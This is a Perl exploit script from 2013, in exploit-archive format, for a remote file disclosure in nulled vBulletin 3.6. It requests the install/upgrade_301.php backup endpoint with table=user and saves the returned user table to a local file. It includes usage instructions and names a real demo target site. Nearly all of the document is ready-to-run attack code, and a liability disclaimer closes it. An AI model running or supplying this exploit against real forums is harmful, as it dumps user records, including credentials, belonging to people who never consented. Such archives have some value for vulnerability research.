#Exploit Title: vBulletin 3.6 Nulled by NightNing Remote File Disclosure
#Exploit Author: D35m0nd142
#Date: 21/03/2013
#Vendor Homepage: http://www.vbulletin.com/
#Tested on: vBulletin 3.6.7
#Demo Website: http://archery.kiev.ua/fforum/
#Youtube Video: http://www.youtube.com/watch?v=wDM9LAfPv0g
#!/usr/bin/perl
use LWP::UserAgent;
use HTTP::Request;
system("clear");
print "------------------------------------------------\n";
print " vBulletin 3.6 Nulled by NightNing exploit \n";
print " created by D35m0nd142 \n";
print "------------------------------------------------\n";
$target = $ARGV[0];
$path = $ARGV[1];
if($target eq '')
{
print "[*] Usage: perl exploit.pl <target> <path> \n";
exit(1);
}
if($target !~ /http:\/\//)
{
$target = "http://$target";
}
sleep 1;
print "[*] Exploiting . . \n";
$agent = LWP::UserAgent->new();
$agent->agent('Mozilla/5.0(X11; Linux x86_64) AppleWebKit/5320 (KHTML, like Gecko) Chrome/13.0.819.0 Safari/5320');
$website = "$target/$path/install/upgrade_301.php?step=backup&do=sqltable&table=user";
$req = $agent->request(HTTP::Request->new(GET=>$website));
if($req->is_success)
{
open(FILE, "> vBulletin_content.txt");
print FILE $req->content;
close(FILE);
print "[*] Exploit sent ! Look in the file 'vBulletin_content.txt' :) \n";
}
else
{
print "[-] Exploit not sent . \n";
}
sleep 1;
//The information contained within this publication is
//supplied "as-is"with no warranties or guarantees of fitness
//of use or otherwise. Bot24, Inc nor Bradley Sean Susser accepts
//responsibility for any damage caused by the use or misuse of
//this information